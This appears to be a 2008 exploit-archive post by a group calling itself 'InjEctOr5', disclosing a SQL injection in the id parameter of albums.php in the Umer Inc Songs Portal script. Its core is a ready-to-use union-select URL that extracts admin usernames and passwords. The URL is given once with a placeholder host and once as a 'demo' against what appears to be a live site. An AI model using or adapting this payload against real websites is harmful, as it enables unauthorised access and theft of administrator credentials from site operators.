[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Umer Inc Songs Portal Script (id) SQL Injection Vulnerability
# Published : 2008-12-12
# Author : InjEctOr5
# Previous Title : VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability
# Next Title : ColdFusion Scripts Red_Reservations Database Disclosure Vulnerability


||          ||   | ||         
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,  
                  ( :   /    (_)    /           (   .   
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / __  /'__`       /  ___    |
|  /_,     ___   /_/_L     ___  ,_/ /   _ __  __/    |
|  /_/  /' _ ` / /_/__<_  /'___  /    /`'__ ___``  |
|       / /    / L / __/  _  _   / / L  |
|       _ _ __   ____/ ____\ __\ ____/ _   ____/ |
|       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   ____/ >> Kings of injection                      |
|                   /___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
 
 
<<!>> Found by  :  Fisher
 
<<!>> C0ntact : sq7@w.cn
                    
<<!>> Groups : InjEctOr5 T3am  
 
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
 
 
<<->> script   : Songs Portal
 
<<->> download : www.umerinc.com/songs_portal.php
 
 
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
 
 
<<->> D0rk    :  ;)
 
<<->> Exploit :>>>
 
    :>>  http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
 
 
 
 Demo :
 
 http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin--
 
 
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
 
<<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends

# www.Syue.com [2008-12-12]